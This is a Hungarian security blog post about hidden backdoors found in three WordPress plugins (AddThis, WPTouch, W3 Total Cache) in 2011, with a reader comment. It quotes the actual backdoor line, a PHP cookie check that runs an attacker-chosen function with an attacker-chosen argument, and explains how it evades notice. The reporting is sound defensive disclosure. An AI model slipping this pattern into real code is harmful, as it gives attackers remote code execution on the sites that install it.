Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

WordPress plugin hátsóajtók

2011.06.22. 13:57 | buherator | 1 komment

A WordPress figyelmeztetést adott ki, mely szerint három népszerű pluginban is jól elrejtett hátsó kaput fedeztek fel. Az érintett kiegészítők az AddThis, a WPTouch és a W3 Total Cache, a hátsóajtók jellegéről nincs információ. A blogszolgáltató még vizsgálja, hogy esetleg más pluginekhez is hozzáfértek-e a támadók - azt biztosra veszik, hogy a rosszindulatú módosítások külső féltől származnak, de nem tudják, hogyan sikerült illetéktelenül hozzáférést szerezni a tárolókhoz. 

A három kiegészítő kódját a legutóbbi ismert legitim állapotba állították vissza, és az összes WordPress.org, bbPress.org és BuddyPress.org felhasználónál kényszerítik a jelszóváltoztatást. Egyúttal figyelmeztetnek, hogy aki az utóbbi napokban plugint telepített vagy frissített, az jól teszi, ha nagyobb figyelmet szentel a rendszere biztonságának.

Friss:

A Securi csapata megvizsgálta az érintett pluginokat, és a következő backdoort találták:

 

if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  

                $this->desired_view = $matches[1].$matches[2]; 

Tehát a plugin ellenőrzi egy süti meglétét, egyezés esetén pedig a sütiben tárolt értékeknek megfelelően hajt végre egy függvényt. A trükk az, hogy a függvény neve (és a paraméter) is egy reguláris kifejezés illeszkedéseit tartalmazó változóban jelenik meg, valamint a futtatás és az ellenőrzés is egy if feltételben történik (a törzs már lényegtelen).

 

Címkék: incidens wordpress

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

dnet 2011.06.22. 14:22:02

Aki pedig kevésbé támadható blogengine-t keres: github.com/stef/utterson ;)